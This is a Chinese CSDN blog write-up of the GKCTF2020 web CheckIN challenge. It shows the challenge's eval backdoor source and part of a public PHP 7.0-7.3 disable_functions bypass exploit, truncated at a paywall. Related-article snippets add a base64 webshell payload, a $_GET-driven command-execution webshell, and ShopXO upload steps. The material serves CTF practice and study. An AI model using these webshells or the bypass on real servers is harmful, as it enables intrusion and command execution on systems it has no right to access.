GKCTF2020_web

最新推荐文章于 2022-02-25 18:38:52 发布
VIP文章 最新推荐文章于 2022-02-25 18:38:52 发布
阅读量706 收藏 1
点赞数
分类专栏: 日常刷题 web类 文章标签: php python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChenZIDu/article/details/106341513
版权

不完整,先把打出来的题目写一下,再写复现的好了

CheckIN

源码

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
   
        public $code = null;
        public $decode = null;
        function __construct()
        {
   
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
   
                return $_REQUEST;
        }
}
new ClassName();

利用__construct魔术方法,把Ginkgo的值进行base64解密后命令执行。 先写个最简单的木马,利用蚁剑连接,发现根目录有个readflag,还有个flag,不过flag里面没东西,估计是没有读取权限。readflag读取也乱码了。发现好多函数不能用,看看phpinfo();里面的有效信息。

在这里插入图片描述
发现disable_functions禁用了好多关键函数。想着能不能绕过这些函数来运行readflag,获取flag。

disable_functions绕过

<?php

# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=72530
#
# This exploit should work on all PHP 7.0-7.3 versions
#
# Author: https://github.com/mm0r1

pwn("/readflag");	//改成自己想要运行的命令或者文件,比如说这题的readflag

function pwn($cmd) {
   
    global $abc, $helper;

    function str2ptr(&$str, $p = 0, $s = 8) {
   
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
   
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
   
        $out = "";
        for ($i=0; $i < $m; $i++) {
   
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
   
        $i = 0;
        for($i = 0; $i < $n; $i++) {
   
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
   
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) {
    $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
   
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
最低0.47元/天 解锁文章
ChenZIDu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GKCTF2020]老八小超市儿 -wp
freerats的博客
06-07 1214
这道题本就是基于shopxo已有的漏洞,解题思路也就基于此漏洞,若一开始对此漏洞无了解,那就比较难顶了 打开题目,就是一购物主页。 如果有了解shopxo,就知道默认后台就是admin.php, 登入的默认账号密码是admin和shopxo。 然后就进入到了网站后台 接下来就在应用中心里的应用商店找到主题,然后下载默认主题 因为后面应用主题的时候需要我们重新把下载的这个压缩包传上去,那我们就可以把一句话写入压缩包,给他一起传上去。 我们可以在_static_里面加上一个test.php,这里面就是我们加入
GKCTF2020.zip
07-20
GKCTF2020 逆向 pwn等赛题,除web题外均有
分享一个php下,linux下突破system命令限制的马(方法)
shadowwolf’s blog
07-09 556
<?php $cmd=$_GET["cmd"]; pwn($cmd); function pwn($cmd) { global $abc, $helper; function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address
[GKCTF2020]老八小超市儿
feng的博客
11-27 258
知识点 shopxo后台全版本获取shell 搜索能力 WP 这题又没做出来,很迷,只要问题在于自己知道应该是考察shopxo的漏洞,但是发现怎么查都查不到,但是大师傅们总能是可以查到各种他们需要的东西,还是自己搜索的能力太弱了,这方面的能力也需要加强啊,毕竟做题都是面向谷歌搜索(笑)。 这题的获取shell可以参考这篇文章: 渗透测试|shopxo后台全版本获取shell复现 已经讲的很详细了,一直到把文件传上去都是很详细的。 但是传上去的文件到底在哪是一个很大的问题。 通过在主页f12看源码,可以看
第二周任务[GKCTF2020]
Lumos427的博客
03-26 524
[GKCTF2020]cve版签到 刚看是啥也不会,去百度了一下这题,发现这是一个ssrf漏洞(服务端请求伪造) 下面是在网上找到的介绍 漏洞详情 PHPPHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存
部分WP-GKCTF2020
~airrudder~
05-24 6147
本篇内容 MISC: [GKCTF2020]签到 [GKCTF2020]Pokémon [GKCTF2020]问卷调查 [GKCTF2020]code obfuscation Crypto: [GKCTF2020]小学生的密码学 [GKCTF2020]汉字的秘密 [GKCTF2020]babycrypto Web: [GKCTF2020]CheckIN [GKCTF2020]老八小超市儿 Reverse: [GKCTF2020]Check_1n 上一篇 | 目录 | 下一篇 [GKC.
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
GKCTF2020部分题解
羽的博客
05-24 4620
WEB [GKCTF2020]CheckIN 查看源代码发现没有任何限制,首先尝试传入phpinfo();的base64成功回显 那我们直接传 eval($_POST[1]);的base64然后蚁剑连接即可(Ginkgo=ZXZhbCgkX1BPU1RbMV0pOw==) 在根目录下发现flag和readflag 但是没有权限读取和运行,再仔细看下phpinfo中的信息发现禁用了命令执行的函数,这里给出大神们写的绕过dis_func的php代码 链接:https://pan.baidu.com/s/12
GKCTF2020_Misc_复现
M3ng@L的博客
02-25 663
GKCTF2020_Misc_复现 code obfuscation keywods:keywods:keywods: js混淆,替换密码 得到一张斜着的二维码图片,中间还被分割了一下 使用PS把分割的部分接回去(不要留白),扫描二维码得到 base(gkctf) 使用editor010打开图片数据,数据报错,显然是加了一些其他的东西进去;最简单的方式:binwalk一下 得到一个压缩包,需要密码 根据题目hint 压缩包密码是加密过的 那么这个base(gkctf)就是用在这的了 把常见的base
GKCTF2020-前三道web-wp
A_dmin的博客
05-24 980
GKCTF2020-web 上个网课,作业多的一批,周末都还有课,真的服!!! [GKCTF2020]CheckIN 打开题目得到源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct()
[GKCTF2020]web
臭nana的博客
05-26 1026
CheckIN 打开题目得到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$t
[GKCTF2020]BabyDriver
weixin_47158947的博客
08-05 577
1.用ida打开, 上面什么失败成功就不说了,但是倒数第二行的好像之前做过的maze。。看看这个********** 真的是迷宫,而且只能有一种路径,要不然flag就不一样了。 __int64 __fastcall sub_140001380(__int64 a1, __int64 a2) { __int64 v2; // rbx __int64 v3; // rdi __int64 v4; // rax int v5; // ecx __int16 *v6; // rsi __in
GKCTF web-老八小超市儿 解题思路writeup
qq_41743240的博客
05-24 1149
打开题目 一看就知道是个CMS,我们试着搜索一下ShopXO企业级免费开源商城系统的漏洞,可以知道一个后台的文件上传漏洞 利用方法链接 http://www.nctry.com/1660.html 之后查看flag,会发现是假的,但从中可以知道真实flag在root目录下,访问root目录没有权限 查看根目录的flag.hint可以知道一个线索: Sun May 24 07:51:26 2020 Get The RooT,The Date Is Useful! 然后查看根目录的auto.sh可
GKCTF2020--部分复现(加密和web
SopRomeo的博客
05-26 804
GKCTF2020web CheckIN title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()
GKCTF2020——CRYPTO
cwr1499640048的博客
05-24 1981
小学生的密码学 这道题就是简单的仿射密码 解密网站 base64一下即是flag babycrypto 这道题拿到题目可知是RSA,大数n使用工具暂时无法进行分解,而p给出了高位,低位还未知。 在网上找到了类似的题目,原文链接 这里使用到一个开源的数学软件sagemath 得到了p,于是接下来常规的RSA求解 import gmpy2 import math from Crypto.Util.number import bytes_to_long, long_to_bytes c = gmpy2.m
GKCTF2020web
conelly的博客
03-26 300
[GKCTF2020]cve版签到 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。如果URL包含零(\ 0)字符,则 URL将被静默地截断。 这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 先访问本地主机,用%00截断 /?url=http://127.0.0.1%00www.ctfhub.com 提示要以123结尾 /?url=h
GKCTF 2020(web)
weixin_43610673的博客
05-25 600
菜逼只能赛后复现 CheckIN Base64后即可rec,可以读文件,但不知道flag文件位置 看一下phpinfo 命令执行的函数都给ban完了 用蚁剑链接?Ginkgo=ZXZhbCgkX1BPU1RbY21kXSk7 连接成功之后根目录有readflag,和flag 那就是要执行readflag文件 PHP 7.0-7.3 disable_functions bypasss 直接打 改一下命令就行 Exp要传到/tmp 目录 别的没权限 页面去包含执行 老八小超市儿 和这个基本差不多
GKCTF2020 WEB
fly夏天的博客
06-02 1325
比赛的时候一道题也没做出来,现在看着大佬的wp做一波复现。 1.CheckIn 很明显的一道代码审计题。通过传入base64编码的Ginkgo参数即可执行eval函数。 用蚁剑连接 构造Ginkgo=QGV2YWwoJF9QT1NUWzFdKTs%3d (@eval($_POST[1]); 的base64编码) 发现根目录下存在 flag但是无法打开(权限不足) 同时发现了readflag文件,打开发现是一个程序,包含了cat /flag之类的内容猜测是通过执行该文件来进行读...
[GKCTF2020]Domo
最新发布
08-12
- *1* *2* *3* [GKCTF 2020 部分writeup](https://blog.csdn.net/weixin_44145820/article/details/106310483)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值